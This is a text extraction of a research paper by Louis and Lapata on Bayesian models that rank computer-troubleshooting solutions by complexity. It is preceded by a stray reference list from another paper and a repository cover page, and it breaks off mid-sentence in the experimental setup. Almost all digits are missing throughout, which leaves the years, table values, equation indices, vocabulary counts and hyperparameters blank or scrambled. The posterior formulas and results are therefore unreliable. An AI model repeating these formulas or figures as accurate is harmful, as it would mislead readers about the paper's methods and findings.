aditya a. kalyanpur, adam lally, j. william murdock, eric nyberg, john prager, nico schlaefer, and chris welty. . building wat- son: an overview of the deepqa project. in ai mag- azine, volume ( ), pages – . matthew l. ginsberg. . dr. fill: crosswords and an implemented solver for singly weighted csps. in journal of artificial intelligence research, pages – . stephan gouws, yoshua bengio, and greg corrado. . bilbowa: fast bilingual distributed represen- tations without word alignments. in proceedings of nips deep learning workshop. alex graves, greg wayne, and ivo danihelka. . neural turing machines. arxiv preprint arxiv: . . karl moritz hermann and phil blunsom. . multi- lingual distributed representations without word align- ment. in proceedings of iclr. sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, ( ): – . eric h. huang, richard socher, christopher d. manning, and andrew y. ng. . improving word representa- tions via global context and multiple word prototypes. in proceedings of the association for computational linguistics. mohit iyyer, jordan boyd-graber, leonardo claudino, richard socher, and hal daumé iii. . a neu- ral network for factoid question answering over para- graphs. in proceedings of emnlp. mohit iyyer, varun manjunatha, jordan boyd-graber, and hal daumé iii. . deep unordered compo- sition rivals syntactic methods for text classification. in proceedings of the association for computational linguistics. ryan kiros, ruslan salakhutdinov, and richard s. zemel. . unifying visual-semantic embeddings with multimodal neural language models. transac- tions of the association for computational linguistics. to appear. alexandre klementiev, ivan titov, and binod bhattarai. . inducing crosslingual distributed representa- tions of words. proceedings of coling. geoffrey leech, roger garside, and michael bryant. . claws : the tagging of the british national corpus. in proceedings of coling. michael l. littman, greg a. keim, and noam shazeer. . a probabilistic approach to solving crossword puzzles. artificial intelligence, ( ): – . tomas mikolov, martin karafiát, lukas burget, jan cer- nockỳ, and sanjeev khudanpur. . recurrent neu- ral network based language model. in proceedings of interspeech . tomas mikolov, ilya sutskever, kai chen, greg s. cor- rado, and jeff dean. . distributed representations of words and phrases and their compositionality. in advances in neural information processing systems. jeff mitchell and mirella lapata. . composition in distributional models of semantics. cognitive science, ( ): – . diego mollá and josé luis vicedo. . question an- swering in restricted domains: an overview. compu- tational linguistics, ( ): – . ryan shaw, anindya datta, debra vandermeer, and kaushik dutta. . building a scalable database- driven reverse dictionary. knowledge and data engi- neering, ieee transactions on, ( ): – . ivan vulic, wim de smet, and marie-francine moens. . identifying word translations from comparable corpora using latent topic models. in proceedings of the association for computational linguistics. jason weston, antoine bordes, sumit chopra, and tomas mikolov. . towards ai-complete question answering: a set of prerequisite toy tasks. in arxiv preprint arxiv: . . matthew d. zeiler. . adadelta: an adaptive learn- ing rate method. in arxiv preprint arxiv: . . michael zock and slaven bilac. . word lookup on the basis of associations: from an idea to a roadmap. in proceedings of the acl workshop on enhancing and using electronic dictionaries. edinburgh research explorer which step do i take first? troubleshooting with bayesian models citation for published version: louis, a & lapata, m , 'which step do i take first? troubleshooting with bayesian models', transactions of the association for computational linguistics, vol. , pp. - . <https://tacl .cs.columbia.edu/ojs/index.php/tacl/article/view/ > link: link to publication record in edinburgh research explorer document version: publisher's pdf, also known as version of record published in: transactions of the association for computational linguistics general rights copyright for the publications made accessible via the edinburgh research explorer is retained by the author(s) and / or other copyright owners and it is a condition of accessing these publications that users recognise and abide by the legal requirements associated with these rights. take down policy the university of edinburgh has made every reasonable effort to ensure that edinburgh research explorer content complies with uk legislation. if you believe that the public display of this file breaches copyright please contact openaccess@ed.ac.uk providing details, and we will remove access to the work immediately and investigate your claim. download date: . apr. https://tacl .cs.columbia.edu/ojs/index.php/tacl/article/view/ https://www.research.ed.ac.uk/portal/en/publications/which-step-do-i-take-first-troubleshooting-with-bayesian-models( f fac- b- -ab - d e a c d).html which step do i take first? troubleshooting with bayesian models annie louis and mirella lapata school of informatics, university of edinburgh crichton street, edinburgh eh ab {alouis,mlap}@inf.ed.ac.uk abstract online discussion forums and community question-answering websites provide one of the primary avenues for online users to share information. in this paper, we propose text mining techniques which aid users navigate troubleshooting-oriented data such as ques- tions asked on forums and their suggested so- lutions. we introduce bayesian generative models of the troubleshooting data and apply them to two interrelated tasks: (a) predicting the complexity of the solutions (e.g., plugging a keyboard in the computer is easier compared to installing a special driver) and (b) present- ing them in a ranked order from least to most complex. experimental results show that our models are on par with human performance on these tasks, while outperforming baselines based on solution length or readability. introduction online forums and discussion boards have created novel ways for discovering, sharing, and distribut- ing information. users typically post their ques- tions or problems and obtain possible solutions from other users. through this simple mechanism of community-based question answering, it is possible to find answers to personal, open-ended, or highly specialized questions. however, navigating the in- formation available in web-archived data can be challenging given the lack of appropriate search and browsing facilities. table shows examples typical of the problems and proposed solutions found in troubleshooting- oriented online forums. the first problem concerns a shaky monitor and has three solutions with increas- ing degrees of complexity. solution ( ) is probably easiest to implement in terms of user time, effort, and expertise; solution ( ) is most complex (i.e., the user should understand what signal timing is and the screen is shaking. . move all objects that emit a magnetic field, such as a motor or transformer, away from the monitor. . check if the specified voltage is applied. . check if the signal timing of the computer system is within the specification of the monitor. “illegal operation has occurred” error message is displayed. . software being used is not microsoft-certified for your version of windows. verify that the software is certified by microsoft for your version of windows (see program packaging for this information). . configuration files are corrupt. if possible, save all data, close all programs, and restart the computer. table : example problems and solutions taken from on- line troubleshooting oriented forums. then try to establish whether it is within the specifi- cation of the monitor), whereas solution ( ) is some- where in between. in most cases, the solutions are not organized in any particular fashion, neither in terms of content nor complexity. in this paper, we present models to automatically predict the complexity of troubleshooting solutions, which we argue could improve user experience, and potentially help solve the problem faster (e.g., by prioritizing easier solutions). automatically struc- turing solutions according to complexity could also facilitate search through large archives of solutions or serve as a summarization tool. from a linguis- tic perspective, learning how complexity is verbal- ized can be viewed as an instance of grounded lan- guage acquisition. solutions direct users to carry out certain actions (e.g., on their computers or de- vices) and complexity is an attribute of these ac- tions. information access systems incorporating a notion of complexity would allow to take user in- tentions into account and how these translate into natural language. current summarization and infor- mation retrieval methods are agnostic of such types of text semantics. moreover, the models presented here could be used for analyzing collaborative prob- transactions of the association for computational linguistics, vol. , pp. – , . action editor: eric fosler-lussier. submission batch: / ; revision batch / ; published / . c© association for computational linguistics. lem solving and its social networks. characterizing the content of discussion forums by their complexity can provide additional cues for identifying user au- thority and if there is a need for expert intervention. we begin by validating that the task is indeed meaningful and that humans perceive varying de- grees of complexity when reading troubleshooting solutions. we also show experimentally that users agree in their intuitions about the relative complex- ity of different solutions to the same problem. we define “complexity” as an aggregate notion of the time, expertise, and money required to implement a solution. we next model the complexity predic- tion task, following a bayesian approach. specifi- cally, we learn to assign complexity levels to solu- tions based on their linguistic makeup. we leverage weak supervision in the form of lists of solutions (to different problems) approximately ordered from low to high complexity (see table ). we assume that the data is generated from a fixed number of dis- crete complexity levels. each level has a probability distribution over the vocabulary and there is a canon- ical ordering between levels indicating their relative complexity. during inference, we recover the vo- cabularies of the complexity levels and the ordering of levels that explains the solutions and their attested sequences in the training data. we explore two bayesian models differing in how they learn an ordering among complexity levels. the first model is local, it assigns an expected position (in any list of solutions) to each complexity level and orders the levels based on this expected posi- tion value. the second model is global, it defines probabilities over permutations of complexity lev- els and directly uncovers a consensus ordering from the training data. we evaluate our models on a so- lution ordering task, where the goal is to rank so- lutions from least to most complex. we show that a supervised ranking approach using features based on the predictions of our generative models is on par with human performance on this task while outper- forming competitive baselines based on length and readability of the solution text. related work there is a long tradition of research on decision- theoretic troubleshooting where the aim is to find a cost efficient repair strategy for a malfunction- ing device (heckerman et al., ). typically, a diagnostic procedure (i.e., a planner) is developed that determines the next best troubleshooting step by estimating the expected cost of repair for various plans. costs are specified by domain experts and are usually defined in terms of time and/or money in- curred by carrying out a particular repair action. our notion of complexity is conceptually similar to the cost of an action, however we learn to predict com- plexity levels rather than calibrate them manually. also note that our troubleshooting task is not device specific. our models learn from troubleshooting- oriented data without any restrictions on the prob- lems being solved. previous work on web-based user support has mostly focused on thread analysis. the idea is to model the content structure of forum threads by an- alyzing the requests for information and suggested solutions in the thread data (wang et al., ; kim et al., ). examples of such analysis include identifying which earlier post(s) a given post re- sponds to and in what manner (e.g., is it a question, an answer or a confirmation). other related work (lui and baldwin, ) identifies user characteris- tics in such data, i.e., whether users express them- selves clearly, whether they are technically knowl- edgeable, and so on. although our work does not address threaded discourse, we analyze the content of troubleshooting data and show that it is possible to predict the complexity levels for suggested solu- tions from surface lexical cues. our work bears some relation to language ground- ing, the problem of extracting representations of the meaning of natural language tied to the physical world. mapping instructions to executable actions is an instance of language grounding with applica- tions to automated troubleshooting (branavan et al., ; eisenstein et al., ), navigation (vogel and jurafsky, ), and game-playing (branavan et al., ). in our work, there is no direct attempt to model the environment or the troubleshooting steps. rather, we study the language of instructions and how it correlates with the complexity of the implied actions. our results show that it possible to predict complexity, while being agnostic about the seman- tics of the domain or the effect of the instructions in the corresponding environment. our generative models are trained on existing archives of problems with corresponding solutions (approximately ordered from least to most complex) and learn to predict an ordering for new sets of so- lutions. this setup is related to previous studies on information ordering where the aim is to learn statistical patterns of document structure which can be then used to order new sentences or paragraphs in a coherent manner. some approaches approxi- mate the structure of a document via topic and entity sequences using local dependencies such as condi- tional probabilities (lapata, ; barzilay and la- pata, ) or hidden markov models (barzilay and lee, ). more recently, global approaches which directly model the permutations of topics in the doc- ument have been proposed (chen et al., b). fol- lowing this line of work, one of our models uses the generalized mallows model (fligner and ver- ducci, ) in its generative process which allows to model permutations of complexity levels in the training data. problem formulation our aim in this work is to learn models which can automatically reorder solutions to a problem from low to high complexity. let g = (c , c , .. cn ) be a collection of solutions to a specific problem. we wish to output a list g′ = (c′ , c ′ , .. c ′ n ), such that d(c′j) ≤d(c′j+ ), where d(x) refers to the com- plexity of solution x. . corpus collection as training data we are given problem-solution sets similar to the examples in table where the solu- tions are approximately ordered from low to high complexity. a solution set si is specific to prob- lem pi, and contains an ordered list of npi solu- tions si = (x , x , . . . , xnpi ) such that d(xj) < d(xj+ ). we refer to the number of solutions re- lated to a problem, npi , as its solution set size. for our experiments, we collected problems and their solutions from multiple web sites includ- ing the computing support pages of microsoft, ap- ple, hp, as well as amateur computer help websites such as www.computerhope.com. the prob- lems were mostly frequently asked questions (faqs) referring to malfunctioning personal computers and smart phones. the solutions were provided by com- puter experts or experienced users in the absence the corpus can be downloaded from http: //www.homepages.inf.ed.ac.uk/alouis/ solutioncomplexity.html. solution set size f re qu en cy figure : histogram of solution set sizes of any interaction with other users or their devices and thus constitute a generic list of steps to try out. we assume that in such a situation, the solution providers are likely to suggest simpler solutions be- fore other complex ones, leading to the solution lists being approximately ordered from low to high com- plexity. in the next section, we verify this assump- tion experimentally. in this dataset, the solution set size varies between and and the average number is . . figure illustrates the histogram of solution set sizes found in our corpus. we only considered problems which have no less than two solutions. all words in the corpus were lemmatized and html links and numbers were replaced with placeholders. the resulting vocabulary was approximately , word types ( , tokens). note that our dataset provides only weak super- vision for learning. the relative complexity of so- lutions for the same problem is observed, however, the relative complexity of solutions across different problems is unknown. for example, a hardware is- sue may generally receive highly complex solutions whereas a microphone issue mostly simple ones. . task validation in this section, we detail an annotation experiment where we asked human judges to rank the randomly permuted contents of a solution set according to per- ceived complexity. we performed this study for two reasons. firstly, to ascertain that participants are able to distinguish degrees of complexity and agree on the complexity level of a solution. secondly, to examine whether the ordering produced by partici- pants corresponds to the (gold-standard) faq order of the solutions. if true, this would support our hy- www.computerhope.com http://www.homepages.inf.ed.ac.uk/alouis/solutioncomplexity.html http://www.homepages.inf.ed.ac.uk/alouis/solutioncomplexity.html http://www.homepages.inf.ed.ac.uk/alouis/solutioncomplexity.html b c d faq a . . . . b . . . c . . d . table : correlation matrix for annotators (a–d) and original faq order using kendall’s τ (values are aver- ages over problem-solution sets). pothesis that the solutions in our faq corpus are fre- quently presented according to complexity and that this ordering is reasonable supervision for our mod- els. method we randomly sampled solution sets (their sizes vary between and ) from the faq corpus described in the previous section and randomly permuted the contents of each set. four annotators, one an author of this paper, and three graduate and undergraduate students in computer science were asked to order the solutions in each set from easy to most complex. an easier solution was defined as one “which takes less time or effort to carry out by a user”. the annotators saw a list of solutions for the same problem on a web interface and assigned a rank to each solution to create an or- der. no ties were allowed and a complete ordering was required to keep the annotation simple. the an- notators were fluent english speakers and had some knowledge of computer hardware and software. we refrained from including novice users in our study as they are likely to have very different personal pref- erences resulting in more divergent rankings. results we measured inter-annotator agreement using kendall’s τ, a metric of rank correlation which has been reliably used in information ordering eval- uations (lapata, ; bollegala et al., ; mad- nani et al., ). τ ranges between − and + , where + indicates equivalent rankings, − com- pletely reverse rankings, and independent rank- ings. table shows the pairwise inter-annotator agreement as well as the agreement between each annotator and the original faq order. the table shows fair agreement between the annotators con- firming that this is a reasonable task for humans to do. as can be seen, there are some individual dif- ferences, with the inter-annotator agreement varying from . (for a,b) to . (for a,d). the last column in table reports the agreement between our annotator rankings and the original or- dering of solutions in the faq data. although there is fair agreement with the faq providing support for its use as a gold-standard, the overall τ values are lower compared to inter-annotator agreement. this implies that the ordering may not be strictly increas- ing in complexity in our dataset and that our models should allow for some flexibility during learning. several reasons contributed to disagreements be- tween annotators and with the faq ordering, such as the users’ expertise, personal preferences, or the nature of the solutions. for instance, annotators dis- agreed when multiple solutions were of similar com- plexity. for the first example in table , all anno- tators agreed perfectly and also matched the faq order. for the second example, the annotators dis- agreed with each other and the faq. generative models in the following we introduce two bayesian topic models for the complexity prediction (and rank- ing) task. in these models, complexity is captured through a discrete set d of l levels and a total or- dering between the levels reflects their relative com- plexity. in other words, d = (d ,d , ...dl), where d is easiest level and d(dm) < d(dm+ ) . each complexity level is parametrized by a unigram lan- guage model which captures words likely to occur in solutions with that level. our two models are broadly similar. their gen- erative process assigns a complexity level from d to each solution such that it explains the words in the solution and also the ordering of solu- tions within each solution set. words are gener- ated for each solution by mixing problem-specific words with solution-specific (and hence complexity- related) ones. also, each problem has its own distri- bution over complexity levels which allows for some problems to have more complex solutions on aver- age, some a mix of high and low complexity solu- tions, or otherwise predominantly easier solutions. the main difference between the two models is in the way they capture the ordering between levels. our first model infers a distribution for each level over the positions at which a solution with that com- plexity can occur and uses this distribution to order the levels. levels which on average occur at greater positions have higher complexity. the second model defines probabilities over orderings of levels in the corpus level for each complexity level dm, ≤ m ≤ l, - draw a complexity vocabulary distribution φm ∼ dirichlet(α) - draw a distribution over positions γm ∼ dirichlet(ρ) - draw a distribution ψ for the proportion of complexity- versus problem-specific vocabulary ∼ beta(δ , δ ) solution set level for each solution set qi in the corpus, ≤ i ≤ n, - draw a distribution over the complexity levels θi ∼ dirichlet(β) - draw a problem-specific vocabulary distribution λi ∼ dirichlet(ω) individual solution level for each solution xij in qi, ≤ j ≤ npi , - draw a complexity level assignment, zij ∼ multinomial(θi) - draw a position depending on the level assigned, rij ∼ multinomial(γzij ) word level for each word wijk in solution xij , - draw a switch value to indicate if the word is problem- or complexity-specific, sijk ∼ binomial(ψ) - if sijk = , draw wijk ∼ multinomial(φzij ) - if sijk = , draw wijk ∼ multinomial(λi) figure : generative process for the position model generative process itself. the inference process of this model allows to directly uncover a canonical or- dering of the levels which explains the training data. . expected position model this model infers the vocabulary associated with a complexity level and a distribution over the numer- ical positions in a solution set where such a com- plexity level is likely to occur. after inference, the model uses the position distribution to compute the expected position of each complexity level. the lev- els are ordered from low to high expected position and taken as the order of increasing complexity. the generative process for our model is described in figure . a first phase generates the latent vari- ables which are drawn once for the entire corpus. then, variables are drawn for a solution set, next for each solution in the set, and finally for the words in the solutions. the number of complexity levels l is a parameter in the model, while the vocabulary size v is fixed. for each complexity level dm, we draw one multinomial distribution φ over the vocab- ulary v , and another multinomial γ over the pos- sible positions. these two distributions are drawn from symmetric dirichlet priors with hyperparame- ters α and ρ. solutions will not only contain words relating to their complexity but also to the prob- lem or malfunctioning component at hand. we as- sume these words play a minor role in determining complexity and thus draw a binomial distribution ψ that balances the amount of problem-specific ver- sus complexity-specific vocabulary. this distribu- tion has a beta prior with hyperparameters δ and δ . for each solution set, we draw a distribution over the complexity levels θ from another dirichlet prior with concentration β. this distribution allows each problem to take a different preference and mix of complexity levels for its solutions. another multino- mial λ over the vocabulary is drawn for the problem- specific content of each solution set. λ is given a symmetric dirichlet prior with concentration ω. for each individual solution in a set, we draw a complexity level z from θ, i.e., the complexity level proportions for that problem. a position for the so- lution is then drawn from the position distribution for that level, i.e., γz. the words in the solution are generated by first drawing a switch value for each word indicating if the word came from the problem’s technical or complexity vocabulary. accordingly, the word is drawn from λ or φz. during inference, we are interested in the poste- rior of the model given the faq training data. based on the conditional independencies of the model, the posterior is proportional to: p(ψ|δ ,δ )× l∏ m= [p(φm|α)]× l∏ m= [p(γm|ρ)] × n∏ i= [p(θi|β)]× n∏ i= [p(λi|ω)] × n∏ i= npi∏ j= [p(zij|θi)p(rij|γzij )] × n∏ i= npi∏ j= |xij|∏ k= [p(sijk|ψ)p(wijk|sijk,φzij,λi)] where l is the number of complexity levels, n the number of problems in the training corpus, npi the size of solution set for problem pi, and |xij| the number of words in solution xij. the use of conjugate priors for the multinomial and binomial distributions allows us to integrate out the ψ, φ, γ, λ and θ distributions. the simplified posterior is proportional to: n∏ i= l∏ m= Γ(rmi +βm) Γ ( l∑ m= rmi +βm ) × l∏ m= g∏ r= Γ(qrm+ρr) Γ ( g∑ r= qrm+ρr ) × ∏ u= Γ(tu+δu) Γ ( ∑ u= tu+δu ) × l∏ m= v∏ v= Γ(t m(v)+αv) Γ ( v∑ v= t m(v)+αv ) × n∏ i= v∏ v= Γ(t i (v)+ωv) Γ ( v∑ v= t i (v)+ωv ) where rmi is the number of times level m is as- signed to a solution in problem i. qrm is the num- ber of times a solution with position r is given com- plexity m over the full corpus. positions are integer values between and g. t and t count the num- ber of switch assignments of value (complexity- related word) and (technical word) respectively in the corpus. t m(v) is a refined count of the number of times word type v is assigned switch value in a solution of complexity m. t i (v) counts the number of times switch value is given to word type v in a solution set for problem i. we sample from this posterior using a collapsed gibbs sampling algorithm. the sampling sequence starts with a random initialization to the hidden vari- ables. during each iteration, the sampler chooses a complexity level for each solution based on the current assignments to all other variables. then the switch values for the words in each solution are sam- pled one by one. the hyperparameters are tuned us- ing grid search on development data. the language model concentrations α, ρ and ω are given values less than to obtain sparse distributions. the prior on θ, the topic proportions, is chosen to be greater than to encourage different complexity levels to be used within the same problem rather than assigning all solutions to the same one or two levels. similarly, δ and δ are > . we run , sampling iterations and use the last sample as a draw from the posterior. using these assignments, we also compute an esti- mate for the parameters φm, λi and γm. for exam- ple, the probability of a word v in φm is computed as t m(v)+αv∑ v(t m(v)+αv) . after inference, we obtain probability distribu- tions for each complexity level dm over the vocabu- lary φm and positions γm. we compute the expected position ep of dm as: ep(dm) = g∑ pos= pos ∗γm(pos) ( ) where pos indicates position values. then, we rank the levels in increasing order of ep. . permutations-based model in our second model we incorporate the ordering of complexity levels in the generative process itself. this is achieved by using the generalized mallows model (gmm; fligner and verducci ( )) within our hierarchical generative process. the gmm is a probabilistic model over permutations of items and is frequently used to learn a consensus ordering given a set of different rankings. it assumes there is an underlying canonical order of items and concen- trates probability mass on those permutations that differ from the canonical order by a small amount, while assigning lesser probability to very divergent permutations. probabilistic inference in this model uncovers the canonical ordering. the standard mallows model (mallows, ) has two parameters, a canonical ordering σ and a dispersion penalty ρ > . the probability of an ob- served ordering π is defined as: p(π|ρ,σ) = e −ρd(π,σ) ξ(ρ) , where d(π,σ) is a distance measure such as kendall’s τ, between the canonical ordering σ and an observed ordering π. the gmm decomposes d(π,σ) in a way that captures item-specific dis- tance. this is done by computing an inversion vec- tor representation of d(π,σ). a permutation π of n items can be equivalently represented by a vector of inversion counts v of length n− , where each com- ponent vi equals the number of items j > i that oc- cur before item i in π. the dimension of v is n− since there can be no items greater than the high- est value element. a unique inversion vector can be computed for any permutation and vice versa, and the sum of the inversion vector elements is equal to d(π,σ). each vi is also given a separate disper- sion penalty ρi. then, the gmm is defined as: gmm(v|ρ) ∝ ∏ i e−ρivi ( ) corpus level for each complexity level dm, ≤ m ≤ l, - draw a complexity vocabulary distribution φm ∼ dirichlet(α) - draw the l − dispersion parameters ρr ∼ gmm (µ ,v r) - draw a distribution ψ for the proportion of complexity- versus problem-specific vocabulary ∼ beta(δ , δ ) solution set level for each solution set qi in the corpus, ≤ i ≤ n, - draw a distribution over the complexity levels θi ∼ dirichlet(β) - draw a problem-specific vocabulary distribution λi ∼ dirichlet(ω) - draw a bag of npi levels for the solution set bi ∼ multinomial(θi) - draw an inversion vector vi vi ∼ gmm(ρ) - compute permutation πi of levels using vi - compute level assignments zi using πi and bi. assign level zij to xij for ≤ j ≤ npi . word level for each word wijk in solution xij , - draw a switch value to indicate if the word is problem- or complexity-specific, sijk ∼ binomial(ψ) - if sijk = , draw wijk ∼ multinomial(φzij ) - if sijk = , draw wijk ∼ multinomial(λi) figure : generative process for permutation model. and can be further factorized into item-specific components: gmmi(vi|ρi) ∝ e−ρivi ( ) since the gmm is a member of the exponential fam- ily, a conjugate prior can be defined for each disper- sion parameter ρi which allows for efficient infer- ence. we refer the interested reader to chen et al. ( a) for details on the prior distribution and nor- malization factor for the gmm distribution. figure formalizes the generative story of our own model which uses the gmm as a component. we assume the canonical order is the strictly increas- ing ( , , ..,l) order. for each complexity level dm, we draw a distribution φ over the vocabulary. we also draw l− dispersion parameters from the con- jugate prior gmm density. hyperparameters for this prior are set in a similar fashion to chen et al. ( a). as in the position model, we draw a binomial distribution, ψ (with a beta prior) over complexity- versus problem-specific vocabulary. at the solution set level, we draw a multinomial dis- tribution λ over the vocabulary and a multinomial distribution θ for the proportion of l levels for this problem. both these distributions have dirichlet pri- ors. next, we generate an ordering for the complex- ity levels. we draw npi complexity levels from θ, one for each solution in the set. let b denote this bag of levels (e.g., b = ( , , , , , , ) assuming complexity levels and solutions for a particular problem). we also draw an inversion vector v from the gmm distribution which advantageously allows for small differences from the canonical order. the z assignments are deterministically computed by or- dering the elements of b according to the permuta- tion defined by v. given the conditional independencies of our model, the posterior is proportional to: l∏ m= [p(φm|α)]× l− ∏ r= [p(ρr|µ ,v r)]×p(ψ|δ ,δ ) × n∏ i= [p(θi|β)×p(λi|ω)×p(vi|ρ)×p(bi|θi)] × n∏ i= npi∏ j= |xij|∏ k= [p(sijk|ψ)p(wijk|sijk,φzij,λi)] where l is the number of complexity levels, n the total problems in the training corpus, npi the size of solution set for problem pi, and |xij| the number of words in solution xij. a simplified posterior can be obtained by integrating out the ψ, φ, λ, and θ distributions which is proportional to: n∏ i= l∏ m= Γ(rmi +βm) Γ ( l∑ m= rmi +βm ) × l− ∏ r= gmm (ρr|µ ,v r) × n∏ i= l− ∏ r= gmmr(vir|ρr)× ∏ u= Γ(tu+δu) Γ ( ∑ u= tu+δu ) × l∏ m= v∏ v= Γ(t m(v)+αv) Γ ( v∑ v= t m(v)+αv ) × n∏ i= v∏ v= Γ(t i (v)+ωv) Γ ( v∑ v= t i (v)+ωv ) where the r and t counts are defined similarly as in the expected position model. we use collapsed gibbs sampling to compute samples from this posterior. the sampling sequence level free, space, hard, drive, sure, range, make, least, more, op- erate, than, point, less, cause, slowly, access, may, problem level use, can, media, try, center, signal, network, make, file, sure, when, case, with, change, this, setting, type, remove level system, file, this, restore, do, can, then, use, hard, issue, num, will, disk, start, step, above, run, cleanup, drive, xp level registry, restore, may, virus, use, bio, setting, scanreg, first, ensure, can, page, about, find, install, additional, we, utility table : most likely words assigned to varying complex- ity levels by the permutations-based model. randomly initializes the hidden variables. for a cho- sen solution set si, the sampler draws npi levels (bi), one at a time conditioned on the assignments to all other hidden variables of the model. then the inversion vector vi is created by sampling each vij in turn. at this point, the complexity level as- signments zi can be done deterministically given bi and vi. then the words in each solution set are sampled one at a time. for the dispersion parame- ters, ρ, the normalization constant of the conjugate prior is not known. we sample from the unnormal- ized gmm distribution using slice sampling. other hyperparameters of the model are tuned us- ing development data. the language model dirichlet concentrations (α, ω) are chosen to encourage spar- sity and β > as in the position model. we run the gibbs sampler for , iterations; the disper- sion parameters are resampled every iterations. the last sample is used as a draw from the posterior. . model output in this section we present examples of the complex- ity assignments created by our models. table shows the output of the permutations-based model with levels. each row contains the highest prob- ability words in a single level (from the distribu- tion φm). for the sake of brevity, we only show the two least and most complex levels. in general, we observe more specialized, technical terms in higher levels (e.g., restore, scanreg, registry) which one would expect to correlate with complex solutions. also note that higher levels contain uncertainty de- noting words (e.g., can, find, may) which again are indicative of increasing complexity. using these complexity vocabularies, our models low complexity . cable(s) of new external device are loose or power ca- bles are unplugged. ensure that all cables are properly and securely connected and that pins in the cable or connector are not bent down. . make sure your computer has at least mb of free hard drive space. if your computer has less than mb free, it may cause the computer to operate more slowly. . if the iphone is in a protective case, remove it from the case. if there is a protective film on the display, remove the film. medium complexity . choose a lower video setting for your imported video. . the file property is set to read-only. to work around this issue, remove the read-only property. for more information about file properties, see view the prop- erties for a file. . the system is trying to start from a media device that is not bootable. remove the media device from the drive. high complexity . if you are getting stopped at the cd-key or serial number verification, verify you are entering your cor- rect number. if you lost your number or key or it does not work, you will need to contact the developer of the program. computer hope will not provide any users with an alternate identification number. . the network controller is defective. contact an autho- rized service provider. . network controller interrupt is shared with an expan- sion board. under the computer setup advanced menu, change the resource settings for the board. table : example solutions with low, medium and high expected complexity values (position-based model with complexity levels). the solutions come from various problem-solution sets in the training corpus. expected complexity values are shown in the first column. can compute the expected complexity for any so- lution text, x. this value is given by [ ∑l m= m ∗ p(m|x)]. we estimate the second term, p(m|x), using a) the complexity level language models φm and b) a prior over levels given by the overall fre- quency of different levels on the training data. ta- ble presents examples of solution texts from our training data and their expected complexity under the position-model. we find that the model is able to distinguish intuitively complex solutions from sim- pler ones. aside from measuring expected complex- ity in absolute terms, our models can also also or- der solutions in terms of relative complexity (see the evaluation in section ) and assign a complex- ity value to a problem as a whole. low complexity problems - computer appears locked up and will not turn off when the power button is pressed. - a usb device, headphone, or microphone is not recognized by the computer. - computer will not respond to usb keyboard or mouse. high complexity problems - game software and driver issues. - incorrect, missing or stale visible networks. - i get an error message that says that there is not enough disk space to publish the movie. what can i do? - power led flashes red four times, once every second, fol- lowed by two second pause, and computer beeps four times. table : least and most complex problems based on the expected complexity of their solution set. problems are shown with complexity – (top) and – (bottom) using the position-based model. as mentioned earlier, our models only observe the relative ordering of solutions to individual problems; the relative complexity of two solutions from differ- ent problems is not known. nevertheless, the models are able to rate solutions on a global scale while ac- commodating problem-specific ordering sequences. specifically, we can compute the expected complex- ity of the solution set for problem i, using the in- ferred distribution over levels θi: ∑l m= m × θim. table shows the complexity of different problems as predicted by the position model (with levels). as can be seen, easy problems are associated with accessory components (e.g., mouse or keyboard), whereas complex problems are related to core hard- ware and operating system errors. evaluation experiments in the previous section, we showed how our mod- els can assign an expected complexity value to a so- lution text or an entire problem. now, we present evaluations based on model ability to order solutions according to relative complexity. . solution ordering task we evaluated our models by presenting them with a randomly permuted set of solutions to a problem and examining the accuracy with which they reorder them from least to most complex. at first instance, it would be relatively straightforward to search for the sequence of solutions which has high likelihood under the models. unfortunately, there are two prob- lems with this approach. firstly, the likelihood un- der our models is intractable to compute, so we would need to adopt a simpler and less precise ap- proximation (such as the hidden markov model dis- cussed below). secondly, when the solution set size is large, we cannot enumerate all permutations and need to adopt an approximate search procedure. we opted for a discriminative ranking approach instead which uses the generative models to compute a rich set of features. this choice allows us to simul- taneously obtain features tapping on to different as- pects learned by the models and to use well-defined objective functions. below, we briefly describe the features based on our generative models. we also present additional features used to create baselines for system comparison. likelihood we created a hidden markov model based on the sample from the posterior of our mod- els (for a similar hmm approximation of a bayesian model see elsner et al. ( )). for our model, the hmm has l states, and each state sm corresponds to a complexity level dm. we used the complex- ity language models φm estimated from the poste- rior as the emission probability distribution for the corresponding states. the transition probabilities of the hmm were computed based on the complexity level assignments for the training solution sequences in our posterior sample. the probability of transi- tioning to state sj from state si, p(sj|si), is the con- ditional probability p(dj|di) computed as c(di,dj )c(di) , where c(di,dj) is the number of times the complex- ity level dj is assigned to a solution immediately fol- lowing a solution which was given complexity di. c(di) is the number of times complexity level di is assigned overall in the training corpus. we perform laplace smoothing to avoid zero probability transi- tions between states: p(sj|si) = c(di,dj) + c(di) + l ( ) this hmm formulation allows us to use efficient dy- namic programming to compute the likelihood of a sequence of solutions. given a solution set, we compute an ordering as follows. we enumerate all orderings for sets with size less than , and select the sequence with the highest likelihood. for larger sizes, we use a sim- ulated annealing search procedure which swaps two adjacent solutions in each step. the temperature was set to initially and gradually reduced to . these values were set using minimal tuning on the devel- opment data. after estimating the most likely se- quence for a solution set, we used the predicted rank of each solution as a feature in our discriminative model. expected complexity as mentioned earlier, we computed the expected complexity of a solution x as [ ∑l m= m∗p(m|x)], where the second term was estimated using a complexity level specific language model φm and a uniform prior over levels on the test set. as additional features, we used the solu- tion’s perplexity under each φm, and under each of the technical topics λi, and also the most likely level for the text arg maxm p(m|x). finally, we included features for each word in the training data. the fea- ture value is the word’s expected level multiplied by the probability of the word in the solution text. length we also investigated whether solution length is a predictor of complexity (e.g., simple so- lutions may vary in length and amount of detail from complex ones). we devised three features based on the number of sentences (within a solution), words, and average sentence length. syntax/semantics another related class of fea- tures estimates solution complexity based on sen- tence structure and meaning. we obtained eight syntactic features based on the number of nouns, verbs, adjectives and adverbs, prepositions, pro- nouns, wh-adverbs, modals, and punctuation. other features compute the average and maximum depth of constituent parse trees. the part-of-speech tags and parse trees were obtained using the stanford corenlp toolkit (manning et al., ). in addi- tion, we computed semantic features using word- net (miller, ). they are the average num- ber of senses for each category (noun, verb, adjec- tive/adverb), and the maximum number of senses for the same three classes. we also include the aver- age and maximum lengths of the path to the root of the hypernym tree for nouns and verbs. this class of features roughly approximates the indicators typ- ically used in predicting text readability (schwarm and ostendorf, ; mcnamara et al., ). . experimental setup we performed -fold cross-validation. we trained the ranking model on problem-solution sets; sets were reserved for development and for testing (in each fold). the most frequent words in each training set were filtered as stopwords. the de- velopment data was used to tune the parameters and hyperparameters of the models and the number of complexity levels. we experimented with ranges [ – ] and found that the best number of levels was for the position model and for the permutation- based model, respectively. for the 